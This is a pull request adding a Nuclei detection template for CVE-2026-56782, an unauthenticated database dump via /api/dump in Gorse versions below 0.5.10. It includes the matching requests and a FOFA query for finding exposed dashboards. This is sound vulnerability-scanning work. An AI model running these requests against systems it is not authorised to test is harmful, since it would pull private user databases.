### PR TITLE
Add CVE-2026-56782.yaml - Gorse < 0.5.10 - Unauthenticated Database Dump

### DIFF
--- a/http/cves/2026/CVE-2026-56782.yaml
+++ b/http/cves/2026/CVE-2026-56782.yaml
@@ -1,0 +1,56 @@
+id: CVE-2026-56782
+
+info:
+  name: Gorse < 0.5.10 - Unauthenticated Database Dump
+  author: 0x_Akoko
+  severity: critical
+  description: |
+    Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.
+  impact: |
+    Remote attackers can exfiltrate or overwrite the entire database including sensitive user data without authentication.
+  remediation: |
+    Update to version 0.5.10 or later.
+  reference:
+    - https://github.com/gorse-io/gorse/issues/1292
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-56782
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-56782
+    cwe-id: CWE-306
+  metadata:
+    max-request: 2
+    verified: true
+    vendor: gorse-io
+    product: gorse
+    fofa-query: title="Gorse Dashboard"
+  tags: cve,cve2026,gorse,unauth,exposure,misconfig
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(tolower(body), "gorse")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /api/dump HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/octet-stream")
+          - "!contains(body, 'unauthorized')"
+        condition: and


### PR DESCRIPTION
Added CVE-2026-56782 entry detailing an unauthenticated database dump vulnerability in Gorse versions < 0.5.10.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
